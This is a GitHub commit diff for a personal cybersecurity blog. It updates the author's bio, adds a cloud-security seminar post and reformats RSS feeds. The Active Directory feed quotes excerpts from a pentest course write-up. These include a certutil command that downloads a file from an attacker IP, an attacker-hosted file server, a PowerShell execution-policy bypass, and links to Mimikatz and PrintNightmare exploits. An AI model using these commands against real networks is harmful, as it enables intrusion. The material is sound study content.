-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
7c86848
commit a420fa0
Showing
20 changed files
with
144 additions
and
409 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
|
|
@@ -2,16 +2,19 @@ | |
| # 👋 Hello, World! | ||
| ## I am Atharva Auti | ||
|
|
||
| I am a final-year college student pursuing my **Bachelor of Engineering (B.E.)** in Cyber Security degree at **Mumbai University**. I am an enthusiastic Programmer and a Networking geek with experience working as a **Cybersecurity Researcher and Developer**. | ||
| I am a passionate cybersecurity enthusiast currently pursuing a Master of Science in Cybersecurity Engineering at the [**University of Southern California**](mailto:[email protected]). I hold a Bachelor of Engineering in Cybersecurity with Honors in AI & ML from Mumbai University. With a strong foundation in programming and networking, I have honed my skills through various research and development projects, including my tenure as a reverse engineer at VJTI’s Centre of Excellence in Complex Networks and Data Science, where I focused on ARM-based reverse engineering. | ||
|
|
||
| I recently co-founded **CyHEX Infotech Private Limited**, a startup dedicated to providing development, products, and services that make a difference in the field of cybersecurity. We are constantly learning and staying up-to-date with the latest trends and technologies to provide our clients with the best possible solutions. | ||
| In addition to my academic journey, I co-founded [**CyHEX Infotech Private Limited**](https://cyhex.co), a startup dedicated to advancing cybersecurity solutions through innovative development, products, and services. Our mission is to stay ahead of the curve by continuously learning and adapting to the latest trends and technologies, ensuring we provide our clients with cutting-edge solutions that make a real difference in the field of cybersecurity. | ||
|
|
||
| For business queries and collaborations, drop an email to [[email protected]](mailto:[email protected]) | ||
| My experience spans across different areas of cybersecurity, including threat intelligence, network security, and ethical hacking. I am committed to making a positive impact in the cybersecurity domain, leveraging my skills and experience to contribute to a safer digital world. | ||
|
|
||
| For business queries and collaborations, drop an email to [[email protected]](mailto:[email protected]) | ||
|
|
||
| #### Wanna send a message? | ||
|
|
||
| [[email protected]](mailto:[email protected]) | ||
| [[email protected]](mailto:[email protected]) | ||
| [[email protected]](mailto:[email protected]) | ||
| [[email protected]](mailto:[email protected]) | ||
| [PGP Key](../auti.pub) | ||
|
|
||
| [Discord (auti.dev)](https://discordapp.com/channels/@me/631478564411146262/) | ||
|
|
||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,20 @@ | ||
| +++ | ||
| title = "Cloud Security Basics" | ||
| date = "2024-06-15T12:00:00+05:30" | ||
|
|
||
| description = "Cloud Security Basics" | ||
|
|
||
| tags = ["cloud", "cybersecurity", "blue-teaming"] | ||
| +++ | ||
|
|
||
| #### First seminar on 24th June 2024, as a seminar at Mumbai University | ||
|
|
||
| [Presentation: docs.google.com](https://docs.google.com/presentation/d/1aYIKm7piiS-MUORRLOa0YzjamrX2eQZjI3YzL8b5gug/pub?start=false&loop=false) | ||
|
|
||
| <iframe src="https://docs.google.com/presentation/d/1aYIKm7piiS-MUORRLOa0YzjamrX2eQZjI3YzL8b5gug/pub?start=false&loop=false" frameborder="0" width="100%" height="441" allowfullscreen="true" mozallowfullscreen="true" webkitallowfullscreen="true"></iframe> | ||
|
|
||
| I had the honor of delivering a talk at SAKEC, **Mumbai University**, where I introduced the fundamental concepts of **cloud computing**. This session delved into the **core principles** of cloud architecture, service models, and deployment strategies, providing a comprehensive overview of how cloud technology is transforming the IT landscape. Through **practical examples** and **real-world scenarios**, I highlighted the **benefits of cloud adoption** and discussed the key considerations for securing cloud environments. This informative session aimed to equip the audience with the knowledge needed to navigate the evolving world of cloud computing and leverage its potential in their professional pursuits. | ||
|
|
||
| ### Credits | ||
|
|
||
| I am sincerely grateful to [SAKEC Cybersecurity Department](https://www.sakec.ac.in/cyse/) for inviting me to speak during the Cloud Computing session. The encouragement and support were instrumental in allowing me to share key insights, contributing to a deeper understanding of cloud technology among the attendees. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,85 +1,48 @@ | ||
| <?xml version="1.0" encoding="utf-8" standalone="yes"?> | ||
| <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> | ||
| <channel> | ||
| <title>active-directory on auti.dev ≽^._.^≼ ∫</title> | ||
| <title>Active-Directory on auti.dev ≽^._.^≼ ∫</title> | ||
| <link>https://auti.dev/blog/active-directory/</link> | ||
| <description>Recent content in active-directory on auti.dev ≽^._.^≼ ∫</description> | ||
| <generator>Hugo -- gohugo.io</generator> | ||
| <description>Recent content in Active-Directory on auti.dev ≽^._.^≼ ∫</description> | ||
| <generator>Hugo</generator> | ||
| <language>en-US</language> | ||
| <copyright>Copyright © 2023, Atharva Auti.</copyright> | ||
| <lastBuildDate>Fri, 20 Aug 2021 12:35:53 +0530</lastBuildDate><atom:link href="https://auti.dev/blog/active-directory/index.xml" rel="self" type="application/rss+xml" /> | ||
| <lastBuildDate>Fri, 20 Aug 2021 12:35:53 +0530</lastBuildDate> | ||
| <atom:link href="https://auti.dev/blog/active-directory/index.xml" rel="self" type="application/rss+xml" /> | ||
| <item> | ||
| <title>Useful AD Resources</title> | ||
| <link>https://auti.dev/useful-ad-resources/</link> | ||
| <pubDate>Fri, 20 Aug 2021 12:35:53 +0530</pubDate> | ||
|
|
||
| <guid>https://auti.dev/useful-ad-resources/</guid> | ||
| <description>Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases | ||
| Mitm6: https://github.com/fox-it/mitm6 | ||
| Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView | ||
| Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 | ||
| Mimikatz: https://github.com/gentilkiwi/mimikatz | ||
| PRET: https://github.com/RUB-NDS/PRET | ||
| Praeda: https://github.com/percx/Praeda | ||
| SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486) | ||
| LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899)) | ||
| cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675 | ||
| calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675 | ||
| Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa | ||
| Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/ | ||
| mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ | ||
| Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ | ||
| Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet | ||
| A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/ | ||
| Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html | ||
| GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/</description> | ||
| <description>Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases
Mitm6: https://github.com/fox-it/mitm6
Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
Mimikatz: https://github.com/gentilkiwi/mimikatz
PRET: https://github.com/RUB-NDS/PRET
Praeda: https://github.com/percx/Praeda
SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486)
LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899))
cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675
calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675
Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/
mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet
A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/
Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html
GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/</description> | ||
| </item> | ||
|
|
||
| <item> | ||
| <title>Compromising AD - Part 4: Post Exploitation</title> | ||
| <link>https://auti.dev/compromising-ad-part-4-post-exploitation/</link> | ||
| <pubDate>Tue, 17 Aug 2021 12:35:53 +0530</pubDate> | ||
|
|
||
| <guid>https://auti.dev/compromising-ad-part-4-post-exploitation/</guid> | ||
| <description>Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next &gt;&gt; Useful Active Directory Resources File-Transfers Certutil | ||
| certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host | ||
| python -m SimpleHTTPServer [port] Browser | ||
| Navigate directly to the file (%20 for spaces) FTP | ||
| On Attacker Machine | ||
| python -m pyftpdlib 21 On Victim Machine, Browse to</description> | ||
| <description>Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next &gt;&gt; Useful Active Directory Resources File-Transfers Certutil
certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host
python -m SimpleHTTPServer [port] Browser
Navigate directly to the file (%20 for spaces) FTP
On Attacker Machine
python -m pyftpdlib 21 On Victim Machine, Browse to</description> | ||
| </item> | ||
|
|
||
| <item> | ||
| <title>Compromising AD - Part 3: Post Compromise Attacks</title> | ||
| <link>https://auti.dev/compromising-ad-part-3-post-compromise-attacks/</link> | ||
| <pubDate>Mon, 16 Aug 2021 12:35:53 +0530</pubDate> | ||
|
|
||
| <guid>https://auti.dev/compromising-ad-part-3-post-compromise-attacks/</guid> | ||
| <description>Post-Compromise Attacks Post-Compromise Attacks passthehash ??? WTF Mitigations Token-Impersonation What are tokens? Two types Setup Mitigations Kerberoasting Kerberoast? Mitigations GPP-cPassword-Attacks Group Policy Preferences Attack aka MS14-025 Resources Setup Exploiting &ldquo;Active&rdquo; Machine on HacktheBox Privesc that Machine! Mitigations URL-File-Attacks SCF and URL file attack against writeable share Mitigations Print-Nightmare Resources Exploit Mitigation - just disable the damn service! Installation Exploit Mimikatz What&rsquo;s that? Resources Exploit Golden-Ticket-Attack What is a Golden Ticket? Exploit Mitigations Zero-Logon aka CVE-2020-1472 Resources Exploit Mitigations Next &gt;&gt; Part 4: Post Exploitation passthehash If we crack a password and/or dump the SAM Hashes, we can leverage both for lateral movement in networks!</description> | ||
| </item> | ||
|
|
||
| <item> | ||
| <title>Compromising AD - Part 2: Post Compromise Enumeration</title> | ||
| <link>https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/</link> | ||
| <pubDate>Sun, 15 Aug 2021 12:37:53 +0530</pubDate> | ||
|
|
||
| <guid>https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/</guid> | ||
| <description>Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next &gt;&gt; Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView | ||
| Enumeration Load up a command prompt and cd into Downloads | ||
| powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView | ||
| . .\Powerview.ps1 Fundamental Commands | ||
| Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy).</description> | ||
| <description>Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next &gt;&gt; Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
Enumeration Load up a command prompt and cd into Downloads
powershell -ep bypass	-ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView
. .\Powerview.ps1 Fundamental Commands
Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy).</description> | ||
| </item> | ||
|
|
||
| <item> | ||
| <title>Compromising AD - Part 1: Initial Attack Vectors</title> | ||
| <link>https://auti.dev/compromising-ad-part-1-initial-attack-vectors/</link> | ||
| <pubDate>Sun, 15 Aug 2021 12:35:53 +0530</pubDate> | ||
|
|
||
| <guid>https://auti.dev/compromising-ad-part-1-initial-attack-vectors/</guid> | ||
| <description>Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization&rsquo;s infrastructure. | ||
| Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense.</description> | ||
| <description>Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization&rsquo;s infrastructure.
Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense.</description> | ||
| </item> | ||
|
|
||
| </channel> | ||
| </rss> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,31 +1,27 @@ | ||
| <?xml version="1.0" encoding="utf-8" standalone="yes"?> | ||
| <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> | ||
| <channel> | ||
| <title>blue-teaming on auti.dev ≽^._.^≼ ∫</title> | ||
| <title>Blue-Teaming on auti.dev ≽^._.^≼ ∫</title> | ||
| <link>https://auti.dev/blog/blue-teaming/</link> | ||
| <description>Recent content in blue-teaming on auti.dev ≽^._.^≼ ∫</description> | ||
| <generator>Hugo -- gohugo.io</generator> | ||
| <description>Recent content in Blue-Teaming on auti.dev ≽^._.^≼ ∫</description> | ||
| <generator>Hugo</generator> | ||
| <language>en-US</language> | ||
| <copyright>Copyright © 2023, Atharva Auti.</copyright> | ||
| <lastBuildDate>Tue, 17 Oct 2023 12:35:53 +0530</lastBuildDate><atom:link href="https://auti.dev/blog/blue-teaming/index.xml" rel="self" type="application/rss+xml" /> | ||
| <lastBuildDate>Tue, 17 Oct 2023 12:35:53 +0530</lastBuildDate> | ||
| <atom:link href="https://auti.dev/blog/blue-teaming/index.xml" rel="self" type="application/rss+xml" /> | ||
| <item> | ||
| <title>Demystifying Elastic SIEM</title> | ||
| <link>https://auti.dev/demystifying-elastic-siem/</link> | ||
| <pubDate>Tue, 17 Oct 2023 12:35:53 +0530</pubDate> | ||
|
|
||
| <guid>https://auti.dev/demystifying-elastic-siem/</guid> | ||
| <description>Introduction Hey there! Following my recent presentation at the Elastic Community Event, I&rsquo;m thrilled to extend the insights into setting up Elastic for cybersecurity tools. In this blog, we&rsquo;ll take a hands-on approach, providing a detailed guide on leveraging Elasticsearch and its toolkit. Our focus? Building a robust Security Information and Event Management (SIEM) tool, seamlessly incorporating Suricata, Wazuh, Windows Sysmon, network packet capture, and Apache Webserver. All of this orchestrated within the dependable Proxmox stack and Debian server containers.</description> | ||
| </item> | ||
|
|
||
| <item> | ||
| <title>Leveraging Cybersecurity using ElasticSearch</title> | ||
| <link>https://auti.dev/leveraging-cybersecurity-using-elasticsearch/</link> | ||
| <pubDate>Tue, 17 Oct 2023 12:35:53 +0530</pubDate> | ||
|
|
||
| <guid>https://auti.dev/leveraging-cybersecurity-using-elasticsearch/</guid> | ||
| <description>First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com | ||
| This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch&rsquo;s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs.</description> | ||
| <description>First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com
This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch&rsquo;s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs.</description> | ||
| </item> | ||
|
|
||
| </channel> | ||
| </rss> |
Oops, something went wrong.